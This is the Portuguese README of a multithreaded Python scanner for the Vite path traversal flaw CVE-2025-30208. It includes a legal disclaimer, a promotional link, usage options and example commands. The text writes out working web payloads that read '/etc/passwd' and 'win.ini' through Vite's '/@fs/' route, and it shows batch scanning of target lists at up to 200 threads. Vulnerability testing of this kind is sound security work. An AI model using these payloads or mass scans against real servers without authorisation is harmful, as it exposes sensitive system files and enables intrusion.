
Scanner Python com múltiplas threads para a vulnerabilidade de path traversal do Vite CVE-2025-30208, com suporte a payload personalizado, varredura em lote e depuração de proxy.
As vulnerabilidades descritas neste documento e os procedimentos de reprodução são destinados exclusivamente a fins de pesquisa e educação em segurança cibernética. Nenhuma pessoa pode usar as informações fornecidas neste documento para fins ilegais ou testes não autorizados em sistemas. O autor não se responsabiliza por quaisquer danos diretos ou indiretos decorrentes do uso das informações aqui contidas.
Ao citar, favor indicar a fonte!
https://pc.fenchuan8.com/#/index?forum=101158&yqm=DGR4X
usage: vite_check.py [-h] [-f FILE] [-u URL] [-p PAYLOAD] [--proxy PROXY] [-o OUTPUT] [-t THREADS]
Ferramenta de detecção de vulnerabilidade de path traversal no Vite Author:iSee857
optional arguments:
-h, --help Exibe ajuda
-f FILE, --file FILE Arquivo contendo URLs alvo
-u URL, --url URL URL alvo única
-p PAYLOAD, --payload PAYLOAD
Caminho de detecção personalizado (suporta dois formatos):
1. Com marcador de detecção: /path??indicator
2. Apenas caminho: /path?param=1??
Exemplos:
-p "/@fs/C://windows/win.ini?import&raw??"
-p "/@fs/etc/passwd?import&raw??"
--proxy PROXY Endereço do proxy (ex: http://127.0.0.1:8080)
-o OUTPUT, --output OUTPUT
Nome do arquivo de saída (padrão: results.xlsx)
-t THREADS, --threads THREADS
Número de threads simultâneas (padrão: 50, intervalo: 1-200)```
Exemplos de uso
1. Escanear alvo único:
python CVE-2025-30208-PoC.py -u http://example.com -t 5
2. Escanear em lote arquivo de alvos:
python CVE-2025-30208-PoC.py -f targets.txt -o vuln_results.xlsx
3. Usar payload personalizado:
python CVE-2025-30208-PoC.py -u http://example.com -p "/@fs/etc/passwd?import&raw??"
4. Usar proxy para depuração:
python CVE-2025-30208-PoC.py -u http://example.com --proxy http://127.0.0.1:8080
5. Combinar parâmetros:
python CVE-2025-30208-PoC.py -f targets.txt -t 200 -o critical_vulns.xlsx

